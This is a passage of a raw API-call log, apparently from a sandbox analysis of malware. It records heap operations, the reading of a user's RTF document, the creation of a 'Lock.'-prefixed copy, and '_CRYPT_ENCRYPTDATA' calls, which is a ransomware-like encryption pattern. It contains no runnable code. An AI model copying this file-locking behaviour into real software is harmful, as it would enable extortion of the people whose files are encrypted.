hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0266.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0266.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0266.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545d0 | out: hHeap=0x970000) returned 1 [0266.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0266.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0266.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0266.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0266.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0266.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0266.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0266.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0266.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0266.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0266.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0266.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0266.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0266.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0266.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0266.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0266.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0266.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0266.993] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0266.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0266.993] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0266.994] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0266.994] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0266.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0266.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0266.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0266.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0266.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0266.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0266.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0266.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0266.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0266.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0266.994] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/pTQouiVh4lNVdQWF_W.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\ptqouivh4lnvdqwf_w.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0266.995] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0266.995] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0266.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0266.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0266.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0266.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0266.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0266.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0266.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0266.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0266.995] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0266.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0266.995] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0266.995] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0266.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0266.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0266.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0266.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0266.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0266.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0266.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0266.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0266.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0266.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0266.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e565e8 [0266.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0266.996] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0266.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0266.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0266.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0266.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be08a8 [0266.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0266.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0266.996] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.pTQouiVh4lNVdQWF_W.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\lock.ptqouivh4lnvdqwf_w.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0266.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0266.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0266.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0266.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0266.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0266.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0266.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0266.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0266.997] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0266.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0266.997] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0266.997] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0266.998] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0266.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0266.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0266.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0266.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0266.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0266.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0266.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0266.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0266.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0266.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0266.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0266.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x1258020 [0267.001] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0267.001] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0xf68f, lpOverlapped=0x0) returned 1 [0267.004] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0267.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0267.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0267.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0267.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0267.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf68f) returned 0x2f16018 [0267.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1258020 | out: hHeap=0x970000) returned 1 [0267.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0267.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0267.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0267.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0267.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0267.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0267.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0267.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf68f) returned 0x2f256b0 [0267.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0267.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0267.009] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0267.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0267.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0267.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0267.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0267.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf68f) returned 0x2f16018 [0267.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0267.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0267.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0267.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0267.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0267.011] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0267.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0267.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0267.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0267.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0267.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0267.011] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0267.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0267.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0267.011] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0267.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0267.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0267.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54da8 [0267.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0267.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0267.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0267.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0267.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf68f) returned 0x2f16018 [0267.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55028 [0267.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0267.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0267.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55078 [0267.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0267.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0267.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55088 [0267.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0267.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0267.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0267.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518b0 [0267.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0267.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0267.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0267.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0267.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0267.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf68f) returned 0x2f34d48 [0267.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0267.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0267.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0267.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0267.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0267.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0267.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0267.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0267.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0267.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0267.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0267.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0267.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0267.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0267.014] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.015] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.015] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.015] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.015] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.015] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.015] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0267.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0267.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.015] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.015] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0267.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0267.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0267.015] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0267.016] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0267.016] PeekMessageW 